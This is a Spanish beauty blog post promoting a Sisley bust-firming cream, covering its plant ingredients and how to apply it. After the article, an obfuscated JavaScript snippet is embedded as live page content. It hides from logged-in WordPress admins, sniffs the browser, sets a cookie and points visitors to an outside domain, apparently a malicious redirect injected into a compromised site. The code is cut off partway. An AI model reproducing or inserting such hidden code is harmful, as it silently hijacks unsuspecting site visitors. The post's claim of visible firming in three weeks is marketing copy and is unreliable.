Con la edad hay más mujeres preocupadas por la apariencia y la firmeza del pecho, y son muchas las que acuden a sus perfumerías a por algún tratamiento que les ayude a cuidar esta zona, sin necesidad de pasar por el quirófano.

Hoy os voy a recomendar este producto de Sisley “Phytobuste Formule Phyto-Aromatique”, un producto reafirmante intensivo para la belleza del busto.

Es rico en extractos de plantas (Cola de caballo, Fucus, Hiedra, Potentilla, Vid Roja) y en aceites esenciales con propiedades tonificantes. Phytobuste Formule Phyto-Aromatique reafirma el busto en tan solo 3 semanas, el sujetador natural presenta una apariencia más firme y la piel recupera el tono y la elasticidad.
Consejos de utilización
Tenéis que aplicar Phytobuste por la mañana o por la noche después del aseo:
Hay que aplicarlo cubriendo los senos así como la parte superior del busto hasta el cuello y el nacimiento de los hombros, sin olvidar la cara interna de los brazos, procediendo con amplios movimientos circulares.
En casos de urgente necesidad, como es el caso después de la lactancia, una dieta estricta… es recomendable utilizar por la mañana y por la noche para una cura intensiva durante al menos un mes, o 1 vez al día como tratamiento de mantenimiento.
¡Con este producto podréis sacar del armario esas blusas escotadas que tanto os gustan! Porque un pecho bonito está al alcance de todas!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone